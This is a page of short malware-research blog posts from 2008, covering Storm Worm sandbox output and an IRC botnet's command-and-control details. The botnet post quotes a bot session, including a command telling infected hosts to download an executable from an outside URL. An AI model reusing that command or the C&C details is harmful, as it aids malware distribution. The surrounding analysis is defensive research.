Mail Problems

Thursday, June 5. 2008
The mail server of our university is down since more than two days (sic!). I'm wondering how many mails I have lost up to now and what kind of interesting information did not reach me... If you want to reach me, please use the Gmail account. On the other hand: no distracting e-mails and lots of time to write papers. The ACSAC deadline is next Sunday, presumably I have a paper ready until then :)
Posted by Thorsten Holz in general at 20:59 | Comments (0) | Trackbacks (0)

OECD Report on Malware

Wednesday, June 4. 2008
A few days ago, the OECD published a report entitled "Malicious Software (Malware): A Security Threat to the Internet Economy". It provides a high-level overview of current threats in the area of malware and is a nice read.

Excerpt: "This report, developed in collaboration with experts, aims to inform policy makers about malware impacts, growth and evolution, and countermeasures to combat malware. It seeks to analyse some of the main issues associated with malware and to explore how the international community can better work together to address the problem. Highlights include the following:
  • Spam has evolved from a nuisance to a vehicle for fraud to a vector for distributing malware. Malware, in the form of botnets, has become a critical part of a self sustaining cyber attack system. The use of malware has become more sophisticated and targeted. Many attacks are smaller and attempt to stay "below the radar" of the security and law enforcement communities.

  • The effectiveness of current security technologies and other protections in detecting and containing malware is challenged by the shrinking of the time between the discovery of vulnerabilities in software products and their exploitation.

  • [...]

  • Current response and mitigation are mainly reactive. There is a need for more structured and strategic co-ordination at national and international levels with involvement of all actors to more adequately assess and mitigate the risk of malware.

  • No single entity has a global understanding of the scope, trends, development and consequences of malware and thus the overall malware problem is difficult to quantify. Data on malware are not consistent and terminology for cataloguing and measuring the occurrence of malware is not harmonised.

  • Although its economic and social impacts may be hard to quantify, malware used directly or indirectly can harm critical information infrastructures, result in financial losses, and plays a role in the erosion of trust and confidence in the Internet economy."

A similar report was published a few months ago by ENISA: "Security Economics and The Internal Market" (Authors: R. Anderson, R. Böhme, R. Clayton, and T. Moore) - definitely worth reading!
Posted by Thorsten Holz in paper at 01:17 | Comments (0) | Trackbacks (0)

Storm Worm Dead?

Tuesday, June 3. 2008
The Internet Storm Center had today a story about a "New Stormworm download site". The Storm Worm botnet is thus still live and propagating. However, the size of the botnet is decreasing significantly: Currently, only about 8.2K hosts are online within the network (based on measurement results with the crawler presented in the LEET'08 paper). Compared to the size a few months ago (40K in January, even more a few months earlier), this is a strong decrease. Will the botnet thus become obsolete in the near future?

The CWSandbox analysis of the Storm Worm sample loveyou.exe (MD5: 0679c17b9072d378cb0a39272fed98f5) shows the typical signs of a Storm sample: It first drops a file called C:\WINDOWS\farkrish.exe and also the typical peer-list:

H:\WINDOWS\farkrish.config [peers] 000011213D362D29747E07640874096F = C933DDCB2E6E00
H:\WINDOWS\farkrish.config [peers] 01006C75C1523825A27A642FD05F6859 = BDA2AF3A4A3600
H:\WINDOWS\farkrish.config [peers] 02003727703C8435FA41B70F977E6055 = 53C8003932CD00
H:\WINDOWS\farkrish.config [peers] 0300B623D3499048CC4BB30B5857C959 = C86E5D666A2C00
H:\WINDOWS\farkrish.config [peers] 04000A4C7B4BBC41AE5B6B486A00F613 = 7B11B24647B600
H:\WINDOWS\farkrish.config [peers] 05002744C35A572A932662411A117715 = 7B150612413A00
H:\WINDOWS\farkrish.config [peers] 06000772D412A4727D1B415B7A73F450 = 183C4148226F00
H:\WINDOWS\farkrish.config [peers] 07000600822E65796C39356C6E3C750E = 7B12A2E745FA00
H:\WINDOWS\farkrish.config [peers] 0800F81A9A4D644D6566FC73591C0B5F = C925ECC4375C00
H:\WINDOWS\farkrish.config [peers] 090007168A1C884C2D60D12FD900D86E = 7D19C551116E00
H:\WINDOWS\farkrish.config [peers] 0A00C95E9909F25F7844635C9D0FAD62 = BDA663FA77E400
H:\WINDOWS\farkrish.config [peers] 0B00364A9F3CC648DC1EE87E0E022E70 = 53CB22366F8D00
H:\WINDOWS\farkrish.config [peers] 0C00C65A0A69484DDF47D724A81F3B52 = A007E95F321F00
H:\WINDOWS\farkrish.config [peers] 0D00DE0895137F5AC2376814D6415F4D = 40FEB3F7645700
H:\WINDOWS\farkrish.config [peers] 0E007A157B4A305BD352D1039829B24C = 43954E9F0F4D00
H:\WINDOWS\farkrish.config [peers] 0F00042A5F72C81BD16DDB4B7A38DD14 = 3EFBBF4273AC00
H:\WINDOWS\farkrish.config [peers] 1000A535661B0414FA6556507D75880A = CBDA9AA318CD00
H:\WINDOWS\farkrish.config [peers] 1100556AD128A56385603C71BF3A3476 = 4421178C717600
H:\WINDOWS\farkrish.config [peers] 12000A1B5609B740B609833F2C11B212 = C93AE62B6AFA00
H:\WINDOWS\farkrish.config [peers] 1300907BD345E730C048E311A3705B21 = 539C8C79473500
H:\WINDOWS\farkrish.config [peers] 1400FA75B31AF97F4564B80F49060C72 = 477196302BC400
H:\WINDOWS\farkrish.config [peers] 1500D1510455D5005746601F4E4A584F = BD9C1C33213F00
[...]

Besides this, farkrish.exe is allowed to access the network and the infected machines syncs the time via NTP. The content of the UDP packets that are sent out have the same structure as always:
0000     10 a6 e6 22 f9 ca cc b0 2d a2 8c c7 de 57 ba 53

0010     5e c5 e5 a6 17 02 48 31 46
Thus it seems that there are no major changes in this new update release.
Posted by Thorsten Holz in malware at 11:59 | Comments (0) | Trackbacks (0)

Annoying Botnets

Saturday, May 31. 2008
At cwsandbox.org, we receive quite a few binaries these days. However, we receive also lots of "uninteresting" files like hundreds of copies of Allaple, which we basically filter out in an automated way.
A specific annoying family of malware sample we receive a lot are all the bots related to the two domains proxim.ircgalaxy.pl and ircd.zief.pl. We receive tens or even hundreds of sample of these bots per day. Both domains map to the same IP address 85.114.137.60, which belongs to a co-location provider in Germany. The provider did not yet react to abuse complaints, thus I publish a few more details about this botnet - perhaps someone else can help. The botnet related to the first domains has the Command & Control server listening on TCP port 65520, while the second botnet has the C&C server at TCP port 80. An example communication of the bots looks like:
NICK rzyaaqgs

USER f020501 . . :-Service Pack 2

JOIN &virtu

:* PRIVMSG rzyaaqgs :!get http://dl2.teenpassage.com/~grander/unpr.exe
Posted by Thorsten Holz in malware at 14:44 | Comments (2) | Trackbacks (0)

SPRING 3

Saturday, May 31. 2008
This is a Call for Abstracts for a German workshop for young researchers, thus the following text is in German only.

---------------------------------------------------------------
Arbeitest Du auf dem Gebiet der Reaktiven Sicherheit?

Willst Du Dich mit anderen fachlich austauschen?

Dann haben wir etwas für Dich: Die Fachgruppe SIDAR ("Security - Intrusion Detection and Response") der Gesellschaft für Informatik e.V. veranstaltet die dritte SPRING. SPRING bietet Nachwuchswissenschaftlern auf dem Gebiet der Reaktiven Sicherheit eine Plattform, um themenbezogen Kontakte über die eigene Universität hinaus zu knüpfen. In diesem Jahr findet SPRING am 8. August an der Universität Mannheim statt.

Wir laden Diplomanden und Doktoranden ein, ihre Beiträge zu präsentieren. Die Vorträge können ein breites Spektrum abdecken, von noch laufenden Projekten, die ggf. erstmals einem breiteren Publikum vorgestellt werden, bis zu abgeschlossenen Forschungsarbeiten, die zeitnah auch auf Konferenzen präsentiert wurden bzw. werden sollen oder einen Schwerpunkt der eigenen Diplomarbeit oder Dissertation bilden.

Das Themenspektrum der Reaktiven Sicherheit beinhaltet:
  • Verwundbarkeitsanalyse
  • Intrusion Detection
  • Malware
  • Incident Management
  • Forensik

Mehr Informationen: SPRING 3 Webseite.
---------------------------------------------------------------
Posted by Thorsten Holz in administrativa at 09:55 | Comments (0) | Trackbacks (0)
« previous page   (Page 5 of 40, totaling 196 entries) » next page